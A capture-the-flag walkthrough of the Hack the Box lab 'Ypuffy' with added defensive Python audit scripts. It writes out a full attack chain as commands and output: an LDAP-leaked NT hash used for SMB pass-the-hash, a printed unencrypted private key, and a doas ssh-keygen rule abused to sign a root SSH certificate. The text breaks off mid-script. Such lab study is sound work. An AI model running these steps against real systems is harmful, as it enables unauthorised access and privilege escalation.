Today we are going to solve another CTF challenge, “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Intermediate
Task: Find the user.txt and root.txt files
Note: Since these labs are available online, they have a static IP. The IP of Ypuffy is 10.10.10.107
Let’s start off with our basic nmap command to find out the open ports and services.
c:\Users\jacco>nmap -sV -sC 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 20:51 W. Europe Standard Time
Nmap scan report for 10.10.10.107
Host is up (0.039s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY

Host script results:
|_clock-skew: mean: 1h36m15s, deviation: 2h53m13s, median: -3m45s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6)
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY\x00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System time: 2019-02-17T14:47:47-05:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-02-17 20:47:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.51 seconds
As the LDAP service on port 389 accepts anonymous binds, we use the nmap script “ldap-search” to enumerate the directory, and it returns the NT password hash (sambaNTPassword) of user “alice1978”.
c:\Users\jacco>nmap -p389 --script=ldap-search 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-17 20:56 W. Europe Standard Time
Nmap scan report for 10.10.10.107
Host is up (0.027s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: dc=hackthebox,dc=htb
|     dn: dc=hackthebox,dc=htb
|         dc: hackthebox
|         objectClass: top
|         objectClass: domain
|     dn: ou=passwd,dc=hackthebox,dc=htb
|         ou: passwd
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
|         uid: bob8791
|         cn: Bob
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         userPassword: {BSDAUTH}bob8791
|         uidNumber: 5001
|         gidNumber: 5001
|         gecos: Bob
|         homeDirectory: /home/bob8791
|         loginShell: /bin/ksh
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U ]
|         sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
|     dn: ou=group,dc=hackthebox,dc=htb
|         ou: group
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: bob8791
|         userPassword: {crypt}*
|         gidNumber: 5001
|     dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: alice1978
|         userPassword: {crypt}*
|         gidNumber: 5000
|     dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
|         sambaDomainName: YPUFFY
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464
|         sambaAlgorithmicRidBase: 1000
|         objectclass: sambaDomain
|         sambaNextUserRid: 1000
|         sambaMinPwdLength: 5
|         sambaPwdHistoryLength: 0
|         sambaLogonToChgPwd: 0
|         sambaMaxPwdAge: -1
|         sambaMinPwdAge: 0
|         sambaLockoutDuration: 30
|         sambaLockoutObservationWindow: 30
|         sambaLockoutThreshold: 0
|         sambaForceLogoff: -1
|         sambaRefuseMachinePwdChange: 0
|_        sambaNextRid: 1001

Nmap done: 1 IP address (1 host up) scanned in 12.73 seconds
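The ldap-search output above is a finding a defender can reproduce automatically: an anonymous bind returned alice1978's sambaNTPassword, the NT hash that SMB accepts directly (which is why the next step is pass-the-hash rather than cracking). The following Python script is an added example, not part of the write-up or of nmap: it parses nmap's ldap-search output (or a plain LDIF dump) into entries and flags attributes that should never be readable by an anonymous bind. The sample dump and the hash value in it are constructed.

```python
"""Flag credential material in an LDAP dump that an anonymous bind could read.
Added example; accepts nmap's ldap-search output or plain LDIF."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Attributes that should never be returned to an anonymous bind, with why they matter.
SENSITIVE_ATTRS = {
    "sambaNTPassword": "NT hash, accepted directly for SMB pass-the-hash",
    "sambaLMPassword": "LM hash, trivially crackable",
    "userPassword": "password or crypt hash",
}
# userPassword placeholders that only delegate to the OS and leak nothing.
HARMLESS_USERPASSWORD = re.compile(r"^\{(BSDAUTH|crypt)\}")
NMAP_PREFIX = re.compile(r"^\|_?\s*")  # the "| " / "|_ " decoration of nmap script output

Entry = Dict[str, List[str]]


def parse_ldif(text: str) -> List[Entry]:
    """Parse LDIF (or nmap ldap-search output) into entries: attribute -> values."""
    # Fold RFC 2849 continuation lines (leading space); nmap lines start with '|', so they are untouched.
    lines: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries: List[Entry] = []
    current: Optional[Entry] = None
    for line in lines:
        line = NMAP_PREFIX.sub("", line).strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        attr, _, value = line.partition(":")
        attr, value = attr.strip(), value.strip()
        if value.startswith(":"):  # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        if attr == "dn":
            current = {"dn": [value]}
            entries.append(current)
        elif current is not None:  # lines before the first dn (Context:, script name) carry no attributes
            current.setdefault(attr, []).append(value)
    return entries


def audit_entries(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """Return (dn, attribute, reason) for every exposed credential value."""
    findings = []
    for entry in entries:
        for attr, reason in SENSITIVE_ATTRS.items():
            for value in entry.get(attr, []):
                if attr == "userPassword" and HARMLESS_USERPASSWORD.match(value):
                    continue
                findings.append((entry["dn"][0], attr, reason))
    return findings


# Constructed sample in nmap's output shape; the NT hash below is a placeholder, not a real hash.
SAMPLE = """\
| ldap-search:
|   Context: dc=hackthebox,dc=htb
|     dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
|         uid: bob8791
|         userPassword: {BSDAUTH}bob8791
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         sambaNTPassword: 00112233445566778899AABBCCDDEEFF
|         sambaAcctFlags: [U ]
|     dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
|         userPassword: {crypt}*
"""

if __name__ == "__main__":
    for dn, attr, reason in audit_entries(parse_ldif(SAMPLE)):
        print(f"{dn}: {attr} exposed ({reason})")
```

Run it against the saved nmap output instead of SAMPLE to get the same report for a real scan; the fix on the server side is an LDAP ACL that denies anonymous read of the samba password attributes (and, for a Samba domain, treating any host that ever served them anonymously as having leaked every user's NT hash).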
First, we list the shares on the target machine, authenticating as alice1978 with the NT hash from LDAP (pass-the-hash; the LM half is the empty-password placeholder), and find a share called “alice”. Inside it is a file called “my_private_key.ppk”, which we download to our local system.
root@kali:~/htb/ypuffy# smbmap -u alice1978 -p aad3b435b51404eeaad3b435b51404ee:0B186E661BBDBDCF6047784DE8B9FD8B -d YPUFFY -H 10.10.10.107 -r
[+] Finding open SMB ports....
[+] Hash detected, using pass-the-hash to authentiate
[+] User session establishd on 10.10.10.107...
[+] IP: 10.10.10.107:445	Name: 10.10.10.107
	Disk                                                  	Permissions
	----                                                  	-----------
	alice                                             	READ, WRITE
	./
	dr--r--r--                0 Sun Feb 17 21:03:33 2019	.
	dr--r--r--                0 Wed Aug  1 05:16:50 2018	..
	fr--r--r--             1460 Tue Jul 17 03:38:51 2018	my_private_key.ppk
	IPC$                                              	NO ACCESS
root@kali:~/htb/ypuffy# smbmap -u alice1978 -p aad3b435b51404eeaad3b435b51404ee:0B186E661BBDBDCF6047784DE8B9FD8B -d YPUFFY -H 10.10.10.107 --download alice/my_private_key.ppk
[+] Finding open SMB ports....
[+] Hash detected, using pass-the-hash to authentiate
[+] User session establishd on 10.10.10.107...
[+] Starting download: alice\my_private_key.ppk (1460 bytes)
[+] File output to: /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk
root@kali:~/htb/ypuffy# cat /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20180716
Public-Lines: 6
AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz
1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux
BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj
h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa
iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx
ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw==
Private-Lines: 14
AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF
VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE
cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma
hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q
Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC
3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6
m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6
l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v
4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+
qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh
hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA
AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c
QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl
xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts=
Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9
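The header of the file above says `Encryption: none`, so whoever can read the share holds the private key with no passphrase to break. The following Python code is an added example, not tooling from the write-up or from PuTTY: it parses the PuTTY-User-Key-File-2 layout (header fields, base64 public and private blobs, and the Private-MAC trailer), verifies the MAC for unencrypted keys the way PuTTY computes it for format version 2, and reports whether the private part is stored in the clear. The key blobs it builds for its own sample are constructed placeholders in the right wire shape, not a usable key.

```python
"""Inspect a PuTTY-User-Key-File-2 (.ppk): header fields, key blobs, and whether the
private part is stored in the clear. Added example; the blobs it builds are constructed."""
import base64
import hashlib
import hmac
import struct
from typing import Dict, List


def ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length prefix plus the bytes."""
    return struct.pack(">I", len(b)) + b


def ppk2_mac(algo: str, encryption: str, comment: str, pub: bytes, priv: bytes,
             passphrase: bytes = b"") -> str:
    """Private-MAC for format version 2: HMAC-SHA1 keyed with
    SHA1("putty-private-key-file-mac-key" + passphrase), over the length-prefixed
    algorithm, encryption, comment, public blob and plaintext private blob."""
    key = hashlib.sha1(b"putty-private-key-file-mac-key" + passphrase).digest()
    data = b"".join(ssh_string(x) for x in
                    (algo.encode(), encryption.encode(), comment.encode(), pub, priv))
    return hmac.new(key, data, hashlib.sha1).hexdigest()


def _wrap64(b: bytes) -> List[str]:
    text = base64.b64encode(b).decode()
    return [text[i:i + 64] for i in range(0, len(text), 64)]


def build_ppk2(algo: str, comment: str, pub: bytes, priv: bytes) -> str:
    """Serialize an unencrypted (Encryption: none) version-2 PPK."""
    pub_lines, priv_lines = _wrap64(pub), _wrap64(priv)
    lines = [f"PuTTY-User-Key-File-2: {algo}", "Encryption: none", f"Comment: {comment}",
             f"Public-Lines: {len(pub_lines)}", *pub_lines,
             f"Private-Lines: {len(priv_lines)}", *priv_lines,
             f"Private-MAC: {ppk2_mac(algo, 'none', comment, pub, priv)}"]
    return "\n".join(lines) + "\n"


def parse_ppk2(text: str) -> Dict:
    """Read headers and blobs; verify the MAC when the key is unencrypted."""
    lines = text.splitlines()
    headers, blobs, i = {}, {}, 0
    while i < len(lines):
        key, _, value = lines[i].partition(":")
        key, value = key.strip(), value.strip()
        i += 1
        if key in ("Public-Lines", "Private-Lines"):  # value = number of base64 lines that follow
            count = int(value)
            blobs[key] = base64.b64decode("".join(lines[i:i + count]))
            i += count
        else:
            headers[key] = value
    if "PuTTY-User-Key-File-2" not in headers:
        raise ValueError("not a version-2 PPK file")
    algo, encryption = headers["PuTTY-User-Key-File-2"], headers.get("Encryption", "")
    pub, priv = blobs["Public-Lines"], blobs["Private-Lines"]
    mac_ok = None  # unknown for encrypted keys: the MAC covers the decrypted private blob
    if encryption == "none":
        expected = ppk2_mac(algo, encryption, headers.get("Comment", ""), pub, priv)
        mac_ok = hmac.compare_digest(expected, headers.get("Private-MAC", ""))
    (alen,) = struct.unpack(">I", pub[:4])  # the public blob starts with its algorithm name
    return {"algorithm": algo, "encryption": encryption, "comment": headers.get("Comment", ""),
            "unencrypted": encryption == "none", "mac_ok": mac_ok,
            "blob_algorithm": pub[4:4 + alen].decode(),
            "public_bytes": len(pub), "private_bytes": len(priv)}


def constructed_key() -> str:
    """A PPK with placeholder RSA fields (constructed; not a real key)."""
    pub = ssh_string(b"ssh-rsa") + ssh_string(b"\x01\x00\x01") + ssh_string(b"\x00\xc0\xff\xee" * 32)
    priv = ssh_string(b"\x00\x12\x34\x56" * 8)  # stands in for the d, p, q, iqmp mpints
    return build_ppk2("ssh-rsa", "rsa-key-constructed", pub, priv)


if __name__ == "__main__":
    for field, value in parse_ppk2(constructed_key()).items():
        print(f"{field}: {value}")
```

Pointing `parse_ppk2` at a file collected from a share gives a quick triage answer (`unencrypted: True` means the key is immediately usable by whoever read it, and should be treated as compromised and rotated). Version-3 PPK files use Argon2 and HMAC-SHA-256 and are deliberately not handled here.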
The file we downloaded is a PuTTY private key, so we use puttygen to convert it into an OpenSSH RSA private key. After converting it, we restrict the permissions of the key file and use it to log in through SSH.
root@kali:~/htb/ypuffy# cp /usr/share/smbmap/10.10.10.107-alice_my_private_key.ppk .
root@kali:~/htb/ypuffy# apt-get install putty
root@kali:~/htb/ypuffy# puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o id_rsa
root@kali:~/htb/ypuffy# chmod 600 id_rsa
root@kali:~/htb/ypuffy# ssh -i id_rsa alice1978@10.10.10.107
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

ypuffy$ cat user.txt
acb*****aab
Now we look for files with the SUID bit set and find that “doas” is available on the target machine. It is a command utility similar to “sudo”. We check “/etc/doas.conf” to find what commands we can run, and find that alice1978 may run “/usr/bin/ssh-keygen” as user “userca” without a password.
ypuffy$ find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/local/bin/pwned
/usr/local/libexec/dbus-daemon-launch-helper
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/usr/X11R6/bin/Xorg
/sbin/ping
/sbin/ping6
/sbin/shutdown
ypuffy$ cat /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
ypuffy$ cat /etc/httpd.conf
server "ypuffy.hackthebox.htb" {
	listen on * port 80
	location "/userca*" {
		root "/userca"
		root strip 1
		directory auto index
	}
	location "/sshauth*" {
		fastcgi socket "/run/wsgi/sshauthd.socket"
	}
	location * {
		block drop
	}
}
ypuffy$ cat /etc/ssh/sshd_config
#	$OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile	.ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
--snip--
#	PermitTTY no
#	ForceCommand cvs server
ypuffy$
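The doas.conf and sshd_config listings above are where the privilege escalation is decided: a nopass rule lets alice1978 run ssh-keygen as userca, while sshd trusts /home/userca/ca.pub as a user CA and takes the allowed principals from an external command. The following Python script is an added example, not anything from the write-up or from OpenBSD: it parses both files, answers "which rule applies when this user runs this command as that target" the way doas does (the last matching rule wins), and reports identities that can run ssh-keygen without a password while a user CA is trusted. The configuration texts are copies of what is printed above; the group membership handed to the matcher is an assumption.

```python
"""Evaluate /etc/doas.conf rules as doas does (last matching rule wins) and cross-check
them against sshd's certificate trust settings. Added example; configs copied from the
write-up, group membership assumed."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


@dataclass
class DoasRule:
    action: str                                   # "permit" or "deny"
    options: List[str] = field(default_factory=list)
    identity: str = ""                            # user name, or ":group"
    target: Optional[str] = None                  # "as" user; None means root
    cmd: Optional[str] = None                     # "cmd" path; None means any command
    args: Optional[List[str]] = None              # "args" list; None means any arguments


def parse_doas_conf(text: str) -> List[DoasRule]:
    """Parse lines of the form: action [options] identity [as target] [cmd command [args ...]]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        toks = shlex.split(line)
        rule, i = DoasRule(action=toks[0]), 1
        while i < len(toks) and (toks[i] in OPTIONS or toks[i] == "setenv"):
            if toks[i] == "setenv":               # setenv { VAR=value ... }
                close = toks.index("}", i)
                rule.options.append(" ".join(toks[i:close + 1]))
                i = close + 1
            else:
                rule.options.append(toks[i])
                i += 1
        rule.identity = toks[i]
        i += 1
        if i < len(toks) and toks[i] == "as":
            rule.target, i = toks[i + 1], i + 2
        if i < len(toks) and toks[i] == "cmd":
            rule.cmd, i = toks[i + 1], i + 2
            if i < len(toks) and toks[i] == "args":
                rule.args = toks[i + 1:]
        rules.append(rule)
    return rules


def match_rule(rules: List[DoasRule], user: str, groups: Set[str],
               target: str, cmd: str) -> Optional[DoasRule]:
    """Return the last rule matching (user, target, cmd); None means doas denies."""
    hit = None
    for r in rules:
        ident_ok = r.identity == user or (r.identity.startswith(":") and r.identity[1:] in groups)
        if ident_ok and (r.target or "root") == target and (r.cmd is None or r.cmd == cmd):
            hit = r
    return hit


def parse_sshd_config(text: str) -> Dict[str, str]:
    """keyword (lower-cased, sshd keywords are case-insensitive) -> value for active lines."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            parts = line.split(None, 1)
            cfg[parts[0].lower()] = parts[1] if len(parts) > 1 else ""
    return cfg


def ca_signing_exposure(rules: List[DoasRule], cfg: Dict[str, str]) -> List[Tuple[str, str]]:
    """(identity, target) pairs that may run ssh-keygen without a password while sshd trusts
    a user CA: anyone who can sign with that CA's private key can mint login certificates."""
    if "trustedusercakeys" not in cfg:
        return []
    return [(r.identity, r.target or "root") for r in rules
            if r.action == "permit" and "nopass" in r.options
            and r.cmd is not None and r.cmd.rsplit("/", 1)[-1] == "ssh-keygen"]


# Copies of the two files shown in the write-up.
DOAS_CONF = """permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
"""
SSHD_CONF = """#PubkeyAuthentication yes
AuthorizedKeysFile	.ssh/authorized_keys
AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
"""

if __name__ == "__main__":
    rules, cfg = parse_doas_conf(DOAS_CONF), parse_sshd_config(SSHD_CONF)
    print("alice1978 -> userca ssh-keygen:", match_rule(rules, "alice1978", set(), "userca", "/usr/bin/ssh-keygen"))
    print("CA signing exposure:", ca_signing_exposure(rules, cfg))
    print("principals come from:", cfg.get("authorizedprincipalscommand"))
```

On a real host the group set for `match_rule` comes from `id -Gn user`. The check in `ca_signing_exposure` is the one that matters for this box: the CA private key does not have to be readable by the low-privileged user at all, since a passwordless doas rule for ssh-keygen as the CA owner is equivalent to possessing it.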
Enumerating more
ypuffy$ curl 127.0.0.1/userca/ca.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdYGWZ77kquuiB0W2mPou1MJQaJqX7EEzNHJGQnGqbc7aJMJBtdleDFt4JHVziOAKtT6MUV5/UTSKloLw40T8z1EaAm3ilXoBTQRu9tC3dSkJMV1B4/AN8638KEyFkOGvZ6hFULkch9O3vZsFH8GY/xf8CZNP8hTD/P3EZaXfCEaebAgNb9mlPxA1EfjxTEiAxQJIwYkUcsoEDK/IyJWBXd9MhIm8ejLKuKor9fihHMiwnNTwskwcknt4JZ/tom3CbxmV0wF+nbuIiWWe5HFjeNaxKgfC3RNycVeu0ynUZ3QGPTGILoPQ8jcQoD5pUyKVRMvp33xtbq8CYwIi/lV+b userca@ypuffy.hackthebox.htb
ypuffy$ getent passwd | grep -v ^_
root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
appsrv:*:1000:1000:Application Server:/var/appsrv:/sbin/nologin
alice1978:*:5000:5000:Alice:/home/alice1978:/bin/ksh
ypuffy$ curl 'http://127.0.0.1/sshauth?type=keys&username=alice1978'
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02quxBoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAjh7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/SxaiA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWxivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw== rsa-key-20180716
We request the keys for the root user and get no response, but we are able to retrieve the root user's principal.
ypuffy$ curl "http://127.0.0.1/sshauth?type=principals&username=root"
3m3rgencyB4ckd00r
As we have the root user's principal, we can generate an SSH key pair and have it signed for that principal. Doing so will allow us to log in through SSH as root (PermitRootLogin prohibit-password still allows key-based logins). We know we can run ssh-keygen as userca, but to sign the key we also need the CA's private key that belongs to the trusted ca.pub. We enumerate the machine and find it in the /home/userca directory.
First, we generate an SSH key pair in the /tmp/puckie directory. Then, running ssh-keygen as userca via doas, we sign the public key with the CA key /home/userca/ca, which only userca can read.
ypuffy$ ssh-keygen -f root
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in root.
Your public key has been saved in root.pub.
The key fingerprint is:
SHA256:eX4CmLxRPoydlUfYVNVxt8Tm/zUGLgEBgK4nrVZ9F1c alice1978@ypuffy.hackthebox.htb
The key's randomart image is:
+---[RSA 2048]----+
| .......+o.o+*|
| . ..o.E.o=|
| . . + o o. |
| . . O = + . . |
| o . * S + o . .|
| o + . + * . . oo|
| = o . o o . +|
| o o .|
|. |
+----[SHA256]-----+
ypuffy$ ls -la
total 16
drwxrwxrwx  2 alice1978  wheel   512 Feb 19 06:04 .
drwxrwxrwt  7 root       wheel   512 Feb 19 05:50 ..
-rw-------  1 alice1978  wheel  1679 Feb 19 06:04 root
-rw-r--r--  1 alice1978  wheel   413 Feb 19 06:04 root.pub
ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root root
Signed user key root-cert.pub: id "root" serial 0 for 3m3rgencyB4ckd00r valid forever
ypuffy$ ls -la
total 20
drwxrwxrwx  2 alice1978  wheel   512 Feb 19 06:22 .
drwxrwxrwt  7 root       wheel   512 Feb 19 06:12 ..
-rw-------  1 alice1978  wheel  1675 Feb 19 06:21 root
-rw-r--r--  1 userca     wheel  1526 Feb 19 06:44 root-cert.pub
-rw-r--r--  1 alice1978  wheel   413 Feb 19 06:21 root.pub
ypuffy$ ssh root@localhost -i root
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

ypuffy# whoami
root
ypuffy# cat /root/root.txt
126*****57f
After signing the key, we use the private key together with the certificate that ssh-keygen placed beside it (root-cert.pub) to log in through SSH as the root user.
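When it signed the key, ssh-keygen printed `serial 0 for 3m3rgencyB4ckd00r valid forever`. Those fields are stored in the certificate itself, so an operator who logs or collects issued certificates can audit them after the fact. The following Python code is an added example, not tooling from the write-up or from OpenSSH: it assembles an `ssh-rsa-cert-v01@openssh.com` blob in the OpenSSH wire layout with placeholder key and signature bytes, decodes it the way `ssh-keygen -L` does, and applies the policy checks a CA operator would want (expiry, serial, principals, source-address). The key id and principal in the sample are the ones shown above; the RSA numbers and the signature are constructed, so the blob parses like a real certificate but would not verify against any CA.

```python
"""Build and inspect an OpenSSH user certificate to audit what a CA signed: key id,
principals, serial and validity. Added example; key and signature bytes are placeholders."""
import base64
import struct
from typing import Dict, List, Sequence, Tuple

CERT_TYPE = "ssh-rsa-cert-v01@openssh.com"
FOREVER = 0xFFFFFFFFFFFFFFFF   # valid_before value that ssh-keygen reports as "valid forever"
USER_CERT = 1                  # certificate type field: 1 = user, 2 = host


def s(b: bytes) -> bytes:
    """SSH wire string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


class Reader:
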